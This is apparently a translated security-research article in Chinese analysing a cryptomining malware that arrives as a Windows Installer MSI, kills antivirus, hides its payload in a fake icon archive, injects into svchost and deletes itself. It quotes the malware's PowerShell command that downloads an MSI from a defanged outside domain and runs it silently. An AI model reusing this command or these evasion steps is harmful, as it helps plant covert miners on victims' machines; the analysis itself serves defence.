加密貨幣挖礦惡意軟體開始使用一些包括Windows installer在內的新的繞過技術。
加密貨幣挖礦惡意軟體數量不斷增長的一個原因是其暴利性,另一個原因是可以在系統中不被檢測到,尤其是使用了不同的混淆技術後更難檢測。研究人員發現,攻擊者在不斷的向加密貨幣挖礦惡意軟體中添加混淆技術來繞過AV的檢測。
安裝器行為
圖1. 惡意軟體感染鏈
惡意軟體以Windows installer MSI文件的形式到達受害者機器,Windows installer MSI文件是一個用於安裝軟體的合法應用程式。使用真實的Windows組件可以使其看著不那麼可疑,而且可以繞過一些安全過濾器。
研究人員分析樣本的安裝過程發現,惡意MSI文件會將自己安裝到%AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server目錄下,如果用戶設備上不存在該目錄,就會創建該目錄。該目錄含有許多不同的文件,作為攻擊鏈的一部分:
· bat – 用於終止正在運行的反病毒軟體的腳步文件
· exe – 用於解壓釋放在另一個目錄中的icon.ico文件的解壓工具
· ico – 密碼保護的zip文件,顯示為icon文件
解壓icon.ico後出現兩個文件:
· ocx – 加載器模塊,負責解密和安裝加密貨幣挖礦模塊
· bin – 加密的,UPX打包的,Delphi 編譯的加密貨幣挖礦模塊
安裝過程的另一部分包含在%AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server\{Random Numbers}中創建kernel文件ntdll.dll和Windows USER組件user32.dll。研究人員這是為了預防惡意軟體API的檢測。如下所示的配置文件也會釋放到 %UserTemp%\[Random Number]文件夾中。
圖2. 挖礦機的配置文件
安裝過程使用的語言是Cyrillic而非英語,這或許暗示著惡意軟體來源的區域。
圖3. 安裝過程顯示窗口
進程注入和監視器創建
安裝後,在執行以下命令前,ex.exe文件會解壓icon.ico文件:
rundll32 default.ocx,Entry u
為注入代碼創建3個新Service Host (svchost.exe)進程。前兩個SvcHost進程起著監視器的作用。當注入的svchost進程中止後,這兩個進程負責通過powerShell命令重新下載Windows Installer (.msi)文件。
「powershell.exe -command $cli = new-Object System.Net.WebClient;$cli.Headers[『User-Agent』] = 『Windows Installer』;$f = 『C:\%UserTemp%\{random number}.msi』; $cli.DownloadFile(『hxxps://superdomain1709[.]info/update[.]txt』, $f);Start-Process $f -ArgumentList 『/q』」
然後將第三個SvcHost進程注入到挖礦機模塊並使用下面的命令執行:
「%system32%\svchost.exe –config={malware configuration path}
圖4. 第三個Service Host進程
為了使用檢測和分析變得更難,惡意軟體還有自毀機制。首先,創建和執行下面的文件:
{Random Characters}.cmD <- self-delete command-line script
然後刪除安裝目錄中的所有文件,並移除系統內所有的安裝痕跡。
惡意軟體非常特別的一點是使用主流的Windows Installer builder WiX作為打包器,有點像一層反檢測層。這也說明攻擊者在不斷努力來保證其創建活動處於隱蔽狀態。